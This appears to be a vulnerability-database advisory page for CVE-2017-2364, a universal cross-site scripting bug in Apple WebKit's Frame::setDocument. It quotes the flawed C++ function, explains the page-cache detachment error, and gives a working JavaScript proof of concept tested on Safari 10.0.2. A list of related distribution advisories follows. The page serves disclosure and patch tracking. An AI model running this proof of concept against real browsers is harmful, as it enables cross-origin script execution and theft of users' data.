Lucene search
RootSSV:92883HistoryApr 04, 2017 - 12:00 a.m.
Apple WebKit: UXSS via Frame::setDocument (1)(CVE-2017-2364)
2017-04-0400:00:00
Root
www.seebug.org
11
0.031 Low
EPSS
Percentile
90.1%
void Frame::setDocument(RefPtr<Document>&& newDocument)
{
ASSERT(!newDocument || newDocument->frame() == this);
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
m_doc->prepareForDestruction();
m_doc = newDocument.copyRef();
...
}
The function |prepareForDestruction| only called when the cache state is not |Document::InPageCache|. So the frame will be never detached from the cached document.
PoC:
"use strict";
document.write("click anywhere to start");
window.onclick = () => {
let w = open("about:blank", "one");
let d = w.document;
let a = d.createElement("a");
a.href = "https://abc.xyz/";
a.click(); <<------- about:blank -> Document::InPageCache
let it = setInterval(() => {
try {
w.location.href.toString;
} catch (e) {
clearInterval(it);
let s = d.createElement("a"); <<------ about:blank's document
s.href = "javascript:alert(location)";
s.click();
}
}, 0);
};
Tested on Safari 10.0.2(12602.3.12.0.1).
Related
prion
prion
Design/Logic Flaw
2017-02-20 08:59:00
packetstorm
packetstorm
Apple WebKit Frame::setDocument UXSS
2017-04-09 00:00:00
zdt
zdt
ubuntucve
ubuntucve
CVE-2017-2364
2017-02-16 00:00:00
alpinelinux
alpinelinux
CVE-2017-2364
2017-02-20 08:59:00
debiancve
debiancve
CVE-2017-2364
2017-02-20 08:59:00
cve
cve
CVE-2017-2364
2017-02-20 08:59:00
apple
apple
About the security content of Safari 10.0.3 - Apple Support
2017-01-23 06:32:43
About the security content of Safari 10.0.3
2017-01-23 00:00:00
About the security content of iOS 10.2.1
2017-01-23 00:00:00
nessus
nessus
Ubuntu 16.04 LTS : WebKitGTK+ vulnerabilities (USN-3200-1)
2017-02-17 00:00:00
macOS : Apple Safari < 10.0.3 Multiple Vulnerabilities
2017-01-26 00:00:00
Fedora 25 : webkitgtk4 (2017-0beb752b6e)
2017-03-01 00:00:00
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2017-02-16 00:00:00
WebKitGTK+ vulnerabilities
2017-04-10 00:00:00
fedora
fedora
[SECURITY] Fedora 24 Update: webkitgtk4-2.14.5-1.fc24
2017-02-24 23:19:20
[SECURITY] Fedora 25 Update: webkitgtk4-2.14.5-1.fc25
2017-02-24 22:51:07
openvas
openvas
Fedora Update for webkitgtk4 FEDORA-2017-0beb752b6e
2017-02-25 00:00:00
Apple Safari Multiple Vulnerabilities-01 (Feb 2017)
2017-02-22 00:00:00
Ubuntu: Security Advisory (USN-3200-1)
2017-02-17 00:00:00
archlinux
archlinux
[ASA-201702-9] webkit2gtk: multiple issues
2017-02-11 00:00:00
mageia
mageia
Updated webkit2 packages fix security vulnerability
2017-04-16 09:29:12
Updated webkit2 packages fix security vulnerabilities
2017-03-02 18:11:17
suse
suse
Security update for webkit2gtk3 (important)
2017-11-10 18:22:30
Security update for webkit2gtk3 (important)
2017-11-06 15:08:25
Security update for webkit2gtk3 (important)
2018-01-25 21:10:00
gentoo
gentoo
WebKitGTK+: Multiple vulnerabilities
2017-06-07 00:00:00